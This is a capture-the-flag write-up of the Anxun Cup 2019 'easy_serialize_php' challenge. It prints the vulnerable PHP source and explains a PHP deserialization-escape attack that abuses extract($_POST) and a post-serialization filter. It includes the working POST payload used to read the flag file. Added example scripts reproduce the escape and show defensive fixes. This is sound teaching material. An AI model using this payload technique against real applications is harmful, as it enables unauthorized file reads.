[Anxun Cup 2019]easy_serialize_php 1

Knowledge points: the target file name and its base64 encoding
d0g3_f1ag.php
ZDBnM19mMWFnLnBocA==

<?php

$function = @$_GET['f']; // the f parameter from the query string

function filter($img){
    // strip the dangerous words 'php','flag','php5','php4','fl1g' (case-insensitive)
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    unset($_SESSION); // if $_SESSION already exists, destroy it
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST); // variable overwrite happens here

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); // sha1 hash of the encoded path
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img'])); // the dangerous sink of this challenge: it reads whatever file the decoded img value names
}

1. The extract function

extract() imports the entries of an array as variables in the current scope. Applied to $_POST, it performs variable overwriting: a POST field whose name matches an existing variable replaces that variable's value.

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] ='123';
echo '覆盖前:';
var_dump($_SESSION);
echo "<br>";
extract($_POST);
echo '覆盖后:';
var_dump($_SESSION);

The result is shown in the figure: [figure: var_dump() of $_SESSION before and after extract()]
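The following is an added example, not code from the original post: it reproduces the overwrite with a constructed request body instead of a real POST, and then shows two ways to avoid it (EXTR_SKIP, and an allow-list that never calls extract() on request data). The array $simulated_post and the helper fresh_session() are assumptions of this demo.

```php
<?php
// Added example, not code from the original post: how extract() lets request
// data overwrite an existing variable, and two ways a defender avoids that.
// The POST body is a constructed array so the script runs from the CLI.

function fresh_session(): array {
    return ['user' => 'guest', 'function' => '123'];
}

// Constructed request body. A POST field named _SESSION[flagphp] is parsed by
// PHP into exactly this nested array, which is what the challenge relies on.
$simulated_post = ['_SESSION' => ['flagphp' => 'attacker data', 'user' => 'admin']];

// 1. Default extract() (EXTR_OVERWRITE): the existing $_SESSION is replaced.
$_SESSION = fresh_session();
extract($simulated_post);
echo "default extract: user=" . $_SESSION['user']
   . ", keys=" . implode(',', array_keys($_SESSION)) . "\n";

// 2. EXTR_SKIP: names that already exist in the scope are left alone.
$_SESSION = fresh_session();
extract($simulated_post, EXTR_SKIP);
echo "EXTR_SKIP: user=" . $_SESSION['user']
   . ", keys=" . implode(',', array_keys($_SESSION)) . "\n";

// 3. Preferable: do not extract request data at all. Read only the fields you
//    expect, by name, and leave $_SESSION untouched.
$allowed = ['img_path' => ''];
$input = array_intersect_key($simulated_post, $allowed) + $allowed;
echo "allow-list: " . implode(',', array_keys($input)) . "\n";
```

Run it with the PHP CLI. In the first case $_SESSION is replaced by the nested array from the request (user becomes admin and a flagphp key appears); with EXTR_SKIP the original guest session survives; with the allow-list only img_path is ever read, which is the shape the challenge code should have had.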

2. Understanding $_SESSION

An analogy: when we make a phone call, from the moment the call connects until we hang up the line stays connected, and that connected state is called a session. A session is a shared variable that persists throughout the visitor's interaction with the whole website. When the client does not support cookies, the SESSION variable is used to keep the data correct and safe.

3. Object escape (deserialization escape)

$_SESSION['flagphp'] = 'i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = sha1(base64_encode('123.php')); // 123.php is written arbitrarily here: whatever the program assigns to img is pushed out of the parsed data, so its value does not matter
echo serialize($_SESSION);
// a:2:{s:7:"flagphp";s:43:"i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7";}
// Now flagphp is stripped by the filter:
// a:2:{s:7:"";s:43:"i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7";}
// The first key is now read as the 7 characters ";s:43: but what follows does not parse: after the key's closing quote a ; is expected, and that one character is missing.

So prepend a semicolon to the value of $_SESSION['flagphp']. Now the 7 characters read as the key are followed by the missing separator, the value parses as the integer 1, and the key name is consumed cleanly, which is exactly what we need.

$_SESSION['flagphp'] = ';i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = sha1(base64_encode('123.php'));

// a:2:{s:7:"flagphp";s:44:";i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7";}
// a:2:{s:7:"";s:44:";i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"17770ed716103f91ef23d9913f0f6e37d75f4da7";}

Now, why does the key flagphp have to be exactly 7 characters? Think about what follows the key in the serialized string. After the filter strips the name, the parser still reads 7 characters as the key, and the characters that follow are ";s:44:, that is, the closing quote, the separator and the length prefix of the value, which is at least 4 characters and in this case exactly 7. Why 7 rather than 8? Because once the key name is gone, exactly those 7 characters have to be swallowed as the new key so that the value's own content starts right after them; the key name therefore has to be 7 characters long and built entirely from words the filter removes. I am not sure this explains it clearly; compare the two serialized strings carefully and think it through.

Now everything lines up; these are the values to send in the POST body.
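The following is an added example, not code from the original post. It reproduces the length-prefix escape offline using the challenge's own filter() (copied as-is) on a constructed $session array, and then adds the two checks a defender would put in: refusing a serialized blob that a post-serialization filter would alter, and sanitizing keys and values before serializing so the length prefixes are computed over the bytes actually stored. The helper names serialize_or_refuse() and serialize_sanitized() are assumptions of this demo.

```php
<?php
// Added example, not code from the original post: reproduce the escape offline
// and show the check a defender would add. filter() is copied from the
// challenge source; the session contents below are constructed for the demo.

function filter($img) {
    $filter_arr = array('php', 'flag', 'php5', 'php4', 'fl1g');
    $filter = '/' . implode('|', $filter_arr) . '/i';
    return preg_replace($filter, '', $img);
}

// $_SESSION as it looks after extract($_POST) has replaced it. The base64
// string decodes to d0g3_f1ag.php; img holds whatever the program computed.
$session = [
    'flagphp' => ';i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}',
    'img'     => sha1(base64_encode('123.php')),
];

$serialized = serialize($session);
$filtered   = filter($serialized);
echo "before filter: $serialized\n";
echo "after  filter: $filtered\n";

// The 7-byte key "flagphp" is deleted but its prefix s:7 survives, so the
// parser consumes the next 7 bytes, ";s:44:, as the key, takes i:1 as its
// value, then reads the attacker-chosen img entry and the closing brace.
// Everything after that brace is trailing data (PHP 8.3 and later warn about
// it but still return the parsed array; the @ keeps the demo output clean).
$userinfo = @unserialize($filtered);
echo "keys after unserialize: " . implode(' | ', array_keys($userinfo)) . "\n";
echo "img decodes to: " . base64_decode($userinfo['img']) . "\n";

// Defender's check 1: a filter applied to an already serialized blob must be a
// no-op; if it would change anything, the length prefixes no longer match the
// bytes, so the blob is refused instead of being handed to unserialize().
function serialize_or_refuse(array $data): ?string {
    $blob = serialize($data);
    return filter($blob) === $blob ? $blob : null;
}

// Defender's check 2: sanitize keys and values first, then serialize, so the
// length prefixes are computed over the bytes that are actually stored.
function serialize_sanitized(array $data): string {
    $clean = [];
    foreach ($data as $k => $v) {
        $clean[filter((string) $k)] = is_string($v) ? filter($v) : $v;
    }
    return serialize($clean);
}

echo "refused by check 1: " . var_export(serialize_or_refuse($session) === null, true) . "\n";
$safe = unserialize(serialize_sanitized($session));
echo "img after sanitize-then-serialize: " . $safe['img'] . "\n";
```

Run it with the PHP CLI. The first unserialize() call returns an array whose img entry is the attacker-supplied base64 string, exactly as the writeup describes; serialize_or_refuse() rejects the session because filtering changes the blob, and serialize_sanitized() keeps img as the sha1 value the program computed, because the stray key only loses its name and never gains control of the structure.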

Origin: blog.csdn.net/m0_73728268/article/details/129740135